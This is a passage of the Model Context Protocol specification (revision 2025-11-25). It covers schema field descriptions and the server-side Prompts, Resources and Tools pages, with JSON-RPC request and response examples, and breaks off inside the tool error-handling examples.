arguments?: PromptArgument\[]
A list of arguments to use for templating the prompt.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uri: string
The URI of this resource.
description?: string
A description of what this resource represents.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type of this resource, if known.
annotations?: Annotations
Optional annotations for the client.
size?: number
The size of the raw resource content, in bytes (i.e., before base64 encoding or any tokenization), if known.
This can be used by Hosts to display file sizes and estimate context window usage.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
uriTemplate: string
A URI template (according to RFC 6570) that can be used to construct resource URIs.
description?: string
A description of what this template is for.
This can be used by clients to improve the LLM's understanding of available resources. It can be thought of like a "hint" to the model.
mimeType?: string
The MIME type for all resources that match this template. This should only be included if all resources matching this template have the same type.
Sent from the client to request cancellation of resources/updated notifications from the server. This should follow a previous resources/subscribe request.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
uri: string
The URI of the resource. The URI can use any protocol; it is up to the server how to interpret it.
Sent from the server to request a list of root URIs from the client. Roots allow
servers to ask for specific directories or files to operate on. A common example
for roots is providing a set of repositories or directories a server should operate
on.
This request is typically used when the server needs to understand the file system
structure or access specific locations that the client has permission to read from.
The client's response to a roots/list request from the server.
This result contains an array of Root objects, each representing a root directory
or file that the server can operate on.
Represents a root directory or file that the server can operate on.
uri: string
The URI identifying the root. This must start with file:// for now.
This restriction may be relaxed in future versions of the protocol to allow
other URI schemes.
name?: string
An optional name for the root. This can be used to provide a human-readable
identifier for the root, which may be useful for display purposes or for
referencing the root in other parts of the application.
A request from the server to sample an LLM via the client. The client has full discretion over which model to select. The client should also inform the user before beginning sampling, to allow them to inspect the request (human in the loop) and decide whether to approve it.
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
messages: SamplingMessage\[]
modelPreferences?: ModelPreferences
The server's preferences for which model to select. The client MAY ignore these preferences.
systemPrompt?: string
An optional system prompt the server wants to use for sampling. The client MAY modify or omit this prompt.
A request to include context from one or more MCP servers (including the caller), to be attached to the prompt.
The client MAY ignore this request.
Default is "none". Values "thisServer" and "allServers" are soft-deprecated. Servers SHOULD only use these values if the client
declares ClientCapabilities.sampling.context. These values may be removed in future spec releases.
temperature?: number
maxTokens: number
The requested maximum number of tokens to sample (to prevent runaway completions).
The client MAY choose to sample fewer tokens than the requested maximum.
stopSequences?: string\[]
metadata?: object
Optional metadata to pass through to the LLM provider. The format of this metadata is provider-specific.
tools?: Tool\[]
Tools that the model may use during generation.
The client MUST return an error if this field is provided but ClientCapabilities.sampling.tools is not declared.
toolChoice?: ToolChoice
Controls how the model uses tools.
The client MUST return an error if this field is provided but ClientCapabilities.sampling.tools is not declared.
Default is \{ mode: "auto" }.
The client's response to a sampling/createMessage request from the server.
The client should inform the user before returning the sampled message, to allow them
to inspect the response (human in the loop) and decide whether to allow the server to see it.
The server's preferences for model selection, requested of the client during sampling.
Because LLMs can vary along multiple dimensions, choosing the "best" model is
rarely straightforward. Different models excel in different areas—some are
faster but less capable, others are more capable but more expensive, and so
on. This interface allows servers to express their priorities across multiple
dimensions to help clients make an appropriate selection for their use case.
These preferences are always advisory. The client MAY ignore them. It is also
up to the client to decide how to interpret these preferences and how to
balance them against other considerations.
hints?: ModelHint\[]
Optional hints to use for model selection.
If multiple hints are specified, the client MUST evaluate them in order
(such that the first match is taken).
The client SHOULD prioritize these hints over the numeric priorities, but
MAY still use the priorities to select from ambiguous matches.
costPriority?: number
How much to prioritize cost when selecting a model. A value of 0 means cost
is not important, while a value of 1 means cost is the most important
factor.
speedPriority?: number
How much to prioritize sampling speed (latency) when selecting a model. A
value of 0 means speed is not important, while a value of 1 means speed is
the most important factor.
intelligencePriority?: number
How much to prioritize intelligence and capabilities when selecting a
model. A value of 0 means intelligence is not important, while a value of 1
means intelligence is the most important factor.
The result of a tool use, provided by the user back to the assistant.
type: "tool\_result"
toolUseId: string
The ID of the tool use this result corresponds to.
This MUST match the ID from a previous ToolUseContent.
content: ContentBlock\[]
The unstructured result content of the tool use.
This has the same format as CallToolResult.content and can include text, images,
audio, resource links, and embedded resources.
structuredContent?: \{ \[key: string]: unknown }
An optional structured result object.
If the tool defined an outputSchema, this SHOULD conform to that schema.
isError?: boolean
Whether the tool use resulted in an error.
If true, the content typically describes the error that occurred.
Default: false
\_meta?: \{ \[key: string]: unknown }
Optional metadata about the tool result. Clients SHOULD preserve this field when
including tool results in subsequent sampling requests to enable caching optimizations.
This ID is used to match tool results to their corresponding tool uses.
name: string
The name of the tool to call.
input: \{ \[key: string]: unknown }
The arguments to pass to the tool, conforming to the tool's input schema.
\_meta?: \{ \[key: string]: unknown }
Optional metadata about the tool use. Clients SHOULD preserve this field when
including tool uses in subsequent sampling requests to enable caching optimizations.
If specified, the caller is requesting task-augmented execution for this request.
The request will return a CreateTaskResult immediately, and the actual result can be
retrieved later via tasks/result.
Task augmentation is subject to capability negotiation - receivers MUST declare support
for task augmentation of specific request types in their capabilities.
If specified, the caller is requesting out-of-band progress notifications for this request (as represented by notifications/progress). The value of this parameter is an opaque token that will be attached to any subsequent notifications. The receiver is not obligated to provide these notifications.
A list of content objects that represent the unstructured result of the tool call.
structuredContent?: \{ \[key: string]: unknown }
An optional JSON object that represents the structured result of the tool call.
isError?: boolean
Whether the tool call ended in an error.
If not set, this is assumed to be false (the call was successful).
Any errors that originate from the tool SHOULD be reported inside the result
object, with isError set to true, not as an MCP protocol-level error
response. Otherwise, the LLM would not be able to see that an error occurred
and self-correct.
However, any errors in finding the tool, an error indicating that the
server does not support tool calls, or any other exceptional conditions,
should be reported as an MCP error response.
Intended for programmatic or logical use, but used as a display name in past specs or fallback (if title isn't present).
title?: string
Intended for UI and end-user contexts — optimized to be human-readable and easily understood,
even by those unfamiliar with domain-specific terminology.
If not provided, the name should be used for display (except for Tool,
where annotations.title should be given precedence over using name,
if present).
description?: string
A human-readable description of the tool.
This can be used by clients to improve the LLM's understanding of available tools. It can be thought of like a "hint" to the model.
Additional properties describing a Tool to clients.
NOTE: all properties in ToolAnnotations are hints.
They are not guaranteed to provide a faithful description of
tool behavior (including descriptive properties like title).
Clients should never make tool use decisions based on ToolAnnotations
received from untrusted servers.
title?: string
A human-readable title for the tool.
readOnlyHint?: boolean
If true, the tool does not modify its environment.
Default: false
destructiveHint?: boolean
If true, the tool may perform destructive updates to its environment.
If false, the tool performs only additive updates.
(This property is meaningful only when readOnlyHint == false)
Default: true
idempotentHint?: boolean
If true, calling the tool repeatedly with the same arguments
will have no additional effect on its environment.
(This property is meaningful only when readOnlyHint == false)
Default: false
openWorldHint?: boolean
If true, this tool may interact with an "open world" of external
entities. If false, the tool's domain of interaction is closed.
For example, the world of a web search tool is open, whereas that
of a memory tool is not.
# Overview
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/index
**Protocol Revision**: 2025-11-25
Servers provide the fundamental building blocks for adding context to language models via
MCP. These primitives enable rich interactions between clients, servers, and language
models:
* **Prompts**: Pre-defined templates or instructions that guide language model
interactions
* **Resources**: Structured data or content that provides additional context to the model
* **Tools**: Executable functions that allow models to perform actions or retrieve
information
Each primitive can be summarized in the following control hierarchy:
| Primitive | Control | Description | Example |
| --------- | ---------------------- | -------------------------------------------------- | ------------------------------- |
| Prompts | User-controlled | Interactive templates invoked by user choice | Slash commands, menu options |
| Resources | Application-controlled | Contextual data attached and managed by the client | File contents, git history |
| Tools | Model-controlled | Functions exposed to the LLM to take actions | API POST requests, file writing |
Explore these key primitives in more detail below:
# Prompts
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/prompts
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to expose prompt
templates to clients. Prompts allow servers to provide structured messages and
instructions for interacting with language models. Clients can discover available
prompts, retrieve their contents, and provide arguments to customize them.
## User Interaction Model
Prompts are designed to be **user-controlled**, meaning they are exposed from servers to
clients with the intention of the user being able to explicitly select them for use.
Typically, prompts would be triggered through user-initiated commands in the user
interface, which allows users to naturally discover and invoke available prompts.
For example, as slash commands:
However, implementors are free to expose prompts through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
## Capabilities
Servers that support prompts **MUST** declare the `prompts` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"prompts": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the server will emit notifications when the list of
available prompts changes.
## Protocol Messages
### Listing Prompts
To retrieve available prompts, clients send a `prompts/list` request. This operation
supports [pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "prompts/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"prompts": [
{
"name": "code_review",
"title": "Request Code Review",
"description": "Asks the LLM to analyze code quality and suggest improvements",
"arguments": [
{
"name": "code",
"description": "The code to review",
"required": true
}
],
"icons": [
{
"src": "https://example.com/review-icon.svg",
"mimeType": "image/svg+xml",
"sizes": ["any"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Getting a Prompt
To retrieve a specific prompt, clients send a `prompts/get` request. Arguments may be
auto-completed through [the completion API](/specification/2025-11-25/server/utilities/completion).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "prompts/get",
"params": {
"name": "code_review",
"arguments": {
"code": "def hello():\n print('world')"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"description": "Code review prompt",
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "Please review this Python code:\ndef hello():\n print('world')"
}
}
]
}
}
```
### List Changed Notification
When the list of available prompts changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/prompts/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Discovery
Client->>Server: prompts/list
Server-->>Client: List of prompts
Note over Client,Server: Usage
Client->>Server: prompts/get
Server-->>Client: Prompt content
opt listChanged
Note over Client,Server: Changes
Server--)Client: prompts/list_changed
Client->>Server: prompts/list
Server-->>Client: Updated prompts
end
```
## Data Types
### Prompt
A prompt definition includes:
* `name`: Unique identifier for the prompt
* `title`: Optional human-readable name of the prompt for display purposes.
* `description`: Optional human-readable description
* `icons`: Optional array of icons for display in user interfaces
* `arguments`: Optional list of arguments for customization
### PromptMessage
Messages in a prompt can contain:
* `role`: Either "user" or "assistant" to indicate the speaker
* `content`: One of the following content types:
All content types in prompt messages support optional
[annotations](./resources#annotations) for metadata about audience, priority,
and modification times.
#### Text Content
Text content represents plain text messages:
```json theme={null}
{
"type": "text",
"text": "The text content of the message"
}
```
This is the most common content type used for natural language interactions.
#### Image Content
Image content allows including visual information in messages:
```json theme={null}
{
"type": "image",
"data": "base64-encoded-image-data",
"mimeType": "image/png"
}
```
The image data **MUST** be base64-encoded and include a valid MIME type. This enables
multi-modal interactions where visual context is important.
#### Audio Content
Audio content allows including audio information in messages:
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
The audio data MUST be base64-encoded and include a valid MIME type. This enables
multi-modal interactions where audio context is important.
#### Embedded Resources
Embedded resources allow referencing server-side resources directly in messages:
```json theme={null}
{
"type": "resource",
"resource": {
"uri": "resource://example",
"mimeType": "text/plain",
"text": "Resource content"
}
}
```
Resources can contain either text or binary (blob) data and **MUST** include:
* A valid resource URI
* The appropriate MIME type
* Either text content or base64-encoded blob data
Embedded resources enable prompts to seamlessly incorporate server-managed content like
documentation, code samples, or other reference materials directly into the conversation
flow.
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Invalid prompt name: `-32602` (Invalid params)
* Missing required arguments: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
## Implementation Considerations
1. Servers **SHOULD** validate prompt arguments before processing
2. Clients **SHOULD** handle pagination for large prompt lists
3. Both parties **SHOULD** respect capability negotiation
## Security
Implementations **MUST** carefully validate all prompt inputs and outputs to prevent
injection attacks or unauthorized access to resources.
# Resources
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/resources
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to expose
resources to clients. Resources allow servers to share data that provides context to
language models, such as files, database schemas, or application-specific information.
Each resource is uniquely identified by a
[URI](https://datatracker.ietf.org/doc/html/rfc3986).
## User Interaction Model
Resources in MCP are designed to be **application-driven**, with host applications
determining how to incorporate context based on their needs.
For example, applications could:
* Expose resources through UI elements for explicit selection, in a tree or list view
* Allow the user to search through and filter available resources
* Implement automatic context inclusion, based on heuristics or the AI model's selection
However, implementations are free to expose resources through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Servers that support resources **MUST** declare the `resources` capability:
```json theme={null}
{
"capabilities": {
"resources": {
"subscribe": true,
"listChanged": true
}
}
}
```
The capability supports two optional features:
* `subscribe`: whether the client can subscribe to be notified of changes to individual
resources.
* `listChanged`: whether the server will emit notifications when the list of available
resources changes.
Both `subscribe` and `listChanged` are optional—servers can support neither,
either, or both:
```json theme={null}
{
"capabilities": {
"resources": {} // Neither feature supported
}
}
```
```json theme={null}
{
"capabilities": {
"resources": {
"subscribe": true // Only subscriptions supported
}
}
}
```
```json theme={null}
{
"capabilities": {
"resources": {
"listChanged": true // Only list change notifications supported
}
}
}
```
## Protocol Messages
### Listing Resources
To discover available resources, clients send a `resources/list` request. This operation
supports [pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "resources/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"resources": [
{
"uri": "file:///project/src/main.rs",
"name": "main.rs",
"title": "Rust Software Application Main File",
"description": "Primary application entry point",
"mimeType": "text/x-rust",
"icons": [
{
"src": "https://example.com/rust-file-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Reading Resources
To retrieve resource contents, clients send a `resources/read` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "resources/read",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"contents": [
{
"uri": "file:///project/src/main.rs",
"mimeType": "text/x-rust",
"text": "fn main() {\n println!(\"Hello world!\");\n}"
}
]
}
}
```
### Resource Templates
Resource templates allow servers to expose parameterized resources using
[URI templates](https://datatracker.ietf.org/doc/html/rfc6570). Arguments may be
auto-completed through [the completion API](/specification/2025-11-25/server/utilities/completion).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "resources/templates/list"
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"resourceTemplates": [
{
"uriTemplate": "file:///{path}",
"name": "Project Files",
"title": "📁 Project Files",
"description": "Access files in the project directory",
"mimeType": "application/octet-stream",
"icons": [
{
"src": "https://example.com/folder-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
]
}
}
```
### List Changed Notification
When the list of available resources changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/resources/list_changed"
}
```
### Subscriptions
The protocol supports optional subscriptions to resource changes. Clients can subscribe
to specific resources and receive notifications when they change:
**Subscribe Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "resources/subscribe",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
**Update Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/resources/updated",
"params": {
"uri": "file:///project/src/main.rs"
}
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Resource Discovery
Client->>Server: resources/list
Server-->>Client: List of resources
Note over Client,Server: Resource Template Discovery
Client->>Server: resources/templates/list
Server-->>Client: List of resource templates
Note over Client,Server: Resource Access
Client->>Server: resources/read
Server-->>Client: Resource contents
Note over Client,Server: Subscriptions
Client->>Server: resources/subscribe
Server-->>Client: Subscription confirmed
Note over Client,Server: Updates
Server--)Client: notifications/resources/updated
Client->>Server: resources/read
Server-->>Client: Updated contents
```
## Data Types
### Resource
A resource definition includes:
* `uri`: Unique identifier for the resource
* `name`: The name of the resource.
* `title`: Optional human-readable name of the resource for display purposes.
* `description`: Optional description
* `icons`: Optional array of icons for display in user interfaces
* `mimeType`: Optional MIME type
* `size`: Optional size in bytes
### Resource Contents
Resources can contain either text or binary data:
#### Text Content
```json theme={null}
{
"uri": "file:///example.txt",
"mimeType": "text/plain",
"text": "Resource content"
}
```
#### Binary Content
```json theme={null}
{
"uri": "file:///example.png",
"mimeType": "image/png",
"blob": "base64-encoded-data"
}
```
### Annotations
Resources, resource templates and content blocks support optional annotations that provide hints to clients about how to use or display the resource:
* **`audience`**: An array indicating the intended audience(s) for this resource. Valid values are `"user"` and `"assistant"`. For example, `["user", "assistant"]` indicates content useful for both.
* **`priority`**: A number from 0.0 to 1.0 indicating the importance of this resource. A value of 1 means "most important" (effectively required), while 0 means "least important" (entirely optional).
* **`lastModified`**: An ISO 8601 formatted timestamp indicating when the resource was last modified (e.g., `"2025-01-12T15:00:58Z"`).
Example resource with annotations:
```json theme={null}
{
"uri": "file:///project/README.md",
"name": "README.md",
"title": "Project Documentation",
"mimeType": "text/markdown",
"annotations": {
"audience": ["user"],
"priority": 0.8,
"lastModified": "2025-01-12T15:00:58Z"
}
}
```
Clients can use these annotations to:
* Filter resources based on their intended audience
* Prioritize which resources to include in context
* Display modification times or sort by recency
## Common URI Schemes
The protocol defines several standard URI schemes. This list not
exhaustive—implementations are always free to use additional, custom URI schemes.
### https\://
Used to represent a resource available on the web.
Servers **SHOULD** use this scheme only when the client is able to fetch and load the
resource directly from the web on its own—that is, it doesn’t need to read the resource
via the MCP server.
For other use cases, servers **SHOULD** prefer to use another URI scheme, or define a
custom one, even if the server will itself be downloading resource contents over the
internet.
### file://
Used to identify resources that behave like a filesystem. However, the resources do not
need to map to an actual physical filesystem.
MCP servers **MAY** identify file:// resources with an
[XDG MIME type](https://specifications.freedesktop.org/shared-mime-info-spec/0.14/ar01s02.html#id-1.3.14),
like `inode/directory`, to represent non-regular files (such as directories) that don’t
otherwise have a standard MIME type.
### git://
Git version control integration.
### Custom URI Schemes
Custom URI schemes **MUST** be in accordance with [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986),
taking the above guidance in to account.
## Error Handling
Servers **SHOULD** return standard JSON-RPC errors for common failure cases:
* Resource not found: `-32002`
* Internal errors: `-32603`
Example error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"error": {
"code": -32002,
"message": "Resource not found",
"data": {
"uri": "file:///nonexistent.txt"
}
}
}
```
## Security Considerations
1. Servers **MUST** validate all resource URIs
2. Access controls **SHOULD** be implemented for sensitive resources
3. Binary data **MUST** be properly encoded
4. Resource permissions **SHOULD** be checked before operations
# Tools
Source: https://modelcontextprotocol.io/specification/2025-11-25/server/tools
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) allows servers to expose tools that can be invoked by
language models. Tools enable models to interact with external systems, such as querying
databases, calling APIs, or performing computations. Each tool is uniquely identified by
a name and includes metadata describing its schema.
## User Interaction Model
Tools in MCP are designed to be **model-controlled**, meaning that the language model can
discover and invoke tools automatically based on its contextual understanding and the
user's prompts.
However, implementations are free to expose tools through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
For trust & safety and security, there **SHOULD** always
be a human in the loop with the ability to deny tool invocations.
Applications **SHOULD**:
* Provide UI that makes clear which tools are being exposed to the AI model
* Insert clear visual indicators when tools are invoked
* Present confirmation prompts to the user for operations, to ensure a human is in the
loop
## Capabilities
Servers that support tools **MUST** declare the `tools` capability:
```json theme={null}
{
"capabilities": {
"tools": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the server will emit notifications when the list of
available tools changes.
## Protocol Messages
### Listing Tools
To discover available tools, clients send a `tools/list` request. This operation supports
[pagination](/specification/2025-11-25/server/utilities/pagination).
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"tools": [
{
"name": "get_weather",
"title": "Weather Information Provider",
"description": "Get current weather information for a location",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name or zip code"
}
},
"required": ["location"]
},
"icons": [
{
"src": "https://example.com/weather-icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
]
}
],
"nextCursor": "next-page-cursor"
}
}
```
### Calling Tools
To invoke a tool, clients send a `tools/call` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "get_weather",
"arguments": {
"location": "New York"
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false
}
}
```
### List Changed Notification
When the list of available tools changes, servers that declared the `listChanged`
capability **SHOULD** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tools/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant LLM
participant Client
participant Server
Note over Client,Server: Discovery
Client->>Server: tools/list
Server-->>Client: List of tools
Note over Client,LLM: Tool Selection
LLM->>Client: Select tool to use
Note over Client,Server: Invocation
Client->>Server: tools/call
Server-->>Client: Tool result
Client->>LLM: Process result
Note over Client,Server: Updates
Server--)Client: tools/list_changed
Client->>Server: tools/list
Server-->>Client: Updated tools
```
## Data Types
### Tool
A tool definition includes:
* `name`: Unique identifier for the tool
* `title`: Optional human-readable name of the tool for display purposes.
* `description`: Human-readable description of functionality
* `icons`: Optional array of icons for display in user interfaces
* `inputSchema`: JSON Schema defining expected parameters
* Follows the [JSON Schema usage guidelines](/specification/2025-11-25/basic#json-schema-usage)
* Defaults to 2020-12 if no `$schema` field is present
* **MUST** be a valid JSON Schema object (not `null`)
* For tools with no parameters, use one of these valid approaches:
* `{ "type": "object", "additionalProperties": false }` - **Recommended**: explicitly accepts only empty objects
* `{ "type": "object" }` - accepts any object (including with properties)
* `outputSchema`: Optional JSON Schema defining expected output structure
* Follows the [JSON Schema usage guidelines](/specification/2025-11-25/basic#json-schema-usage)
* Defaults to 2020-12 if no `$schema` field is present
* `annotations`: Optional properties describing tool behavior
For trust & safety and security, clients **MUST** consider tool annotations to
be untrusted unless they come from trusted servers.
#### Tool Names
* Tool names **SHOULD** be between 1 and 128 characters in length (inclusive).
* Tool names **SHOULD** be considered case-sensitive.
* The following **SHOULD** be the only allowed characters: uppercase and lowercase ASCII letters (A-Z, a-z), digits
(0-9), underscore (\_), hyphen (-), and dot (.)
* Tool names **SHOULD NOT** contain spaces, commas, or other special characters.
* Tool names **SHOULD** be unique within a server.
* Example valid tool names:
* getUser
* DATA\_EXPORT\_v2
* admin.tools.list
### Tool Result
Tool results may contain [**structured**](#structured-content) or **unstructured** content.
**Unstructured** content is returned in the `content` field of a result, and can contain multiple content items of different types:
All content types (text, image, audio, resource links, and embedded resources)
support optional
[annotations](/specification/2025-11-25/server/resources#annotations) that
provide metadata about audience, priority, and modification times. This is the
same annotation format used by resources and prompts.
#### Text Content
```json theme={null}
{
"type": "text",
"text": "Tool result text"
}
```
#### Image Content
```json theme={null}
{
"type": "image",
"data": "base64-encoded-data",
"mimeType": "image/png",
"annotations": {
"audience": ["user"],
"priority": 0.9
}
}
```
#### Audio Content
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
#### Resource Links
A tool **MAY** return links to [Resources](/specification/2025-11-25/server/resources), to provide additional context
or data. In this case, the tool will return a URI that can be subscribed to or fetched by the client:
```json theme={null}
{
"type": "resource_link",
"uri": "file:///project/src/main.rs",
"name": "main.rs",
"description": "Primary application entry point",
"mimeType": "text/x-rust"
}
```
Resource links support the same [Resource annotations](/specification/2025-11-25/server/resources#annotations) as regular resources to help clients understand how to use them.
Resource links returned by tools are not guaranteed to appear in the results
of a `resources/list` request.
#### Embedded Resources
[Resources](/specification/2025-11-25/server/resources) **MAY** be embedded to provide additional context
or data using a suitable [URI scheme](./resources#common-uri-schemes). Servers that use embedded resources **SHOULD** implement the `resources` capability:
```json theme={null}
{
"type": "resource",
"resource": {
"uri": "file:///project/src/main.rs",
"mimeType": "text/x-rust",
"text": "fn main() {\n println!(\"Hello world!\");\n}",
"annotations": {
"audience": ["user", "assistant"],
"priority": 0.7,
"lastModified": "2025-05-03T14:30:00Z"
}
}
}
```
Embedded resources support the same [Resource annotations](/specification/2025-11-25/server/resources#annotations) as regular resources to help clients understand how to use them.
#### Structured Content
**Structured** content is returned as a JSON object in the `structuredContent` field of a result.
For backwards compatibility, a tool that returns structured content SHOULD also return the serialized JSON in a TextContent block.
#### Output Schema
Tools may also provide an output schema for validation of structured results.
If an output schema is provided:
* Servers **MUST** provide structured results that conform to this schema.
* Clients **SHOULD** validate structured results against this schema.
Example tool with output schema:
```json theme={null}
{
"name": "get_weather_data",
"title": "Weather Data Retriever",
"description": "Get current weather data for a location",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name or zip code"
}
},
"required": ["location"]
},
"outputSchema": {
"type": "object",
"properties": {
"temperature": {
"type": "number",
"description": "Temperature in celsius"
},
"conditions": {
"type": "string",
"description": "Weather conditions description"
},
"humidity": {
"type": "number",
"description": "Humidity percentage"
}
},
"required": ["temperature", "conditions", "humidity"]
}
}
```
Example valid response for this tool:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"content": [
{
"type": "text",
"text": "{\"temperature\": 22.5, \"conditions\": \"Partly cloudy\", \"humidity\": 65}"
}
],
"structuredContent": {
"temperature": 22.5,
"conditions": "Partly cloudy",
"humidity": 65
}
}
}
```
Providing an output schema helps clients and LLMs understand and properly handle structured tool outputs by:
* Enabling strict schema validation of responses
* Providing type information for better integration with programming languages
* Guiding clients and LLMs to properly parse and utilize the returned data
* Supporting better documentation and developer experience
### Schema Examples
#### Tool with default 2020-12 schema:
```json theme={null}
{
"name": "calculate_sum",
"description": "Add two numbers",
"inputSchema": {
"type": "object",
"properties": {
"a": { "type": "number" },
"b": { "type": "number" }
},
"required": ["a", "b"]
}
}
```
#### Tool with explicit draft-07 schema:
```json theme={null}
{
"name": "calculate_sum",
"description": "Add two numbers",
"inputSchema": {
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"a": { "type": "number" },
"b": { "type": "number" }
},
"required": ["a", "b"]
}
}
```
#### Tool with no parameters:
```json theme={null}
{
"name": "get_current_time",
"description": "Returns the current server time",
"inputSchema": {
"type": "object",
"additionalProperties": false
}
}
```
## Error Handling
Tools use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for issues like:
* Unknown tools
* Malformed requests (requests that fail to satisfy [CallToolRequest schema](/specification/2025-11-25/schema#calltoolrequest))
* Server errors
2. **Tool Execution Errors**: Reported in tool results with `isError: true`:
* API failures
* Input validation errors (e.g., date in wrong format, value out of range)
* Business logic errors
**Tool Execution Errors** contain actionable feedback that language models can use to self-correct and retry with adjusted parameters.
**Protocol Errors** indicate issues with the request structure itself that models are less likely to be able to fix.
Clients **SHOULD** provide tool execution errors to language models to enable self-correction.
Clients **MAY** provide protocol errors to language models, though these are less likely to result in successful recovery.
Example protocol error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -32602,
"message": "Unknown tool: invalid_tool_name"
}
}
```
Example tool execution error (input validation):
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
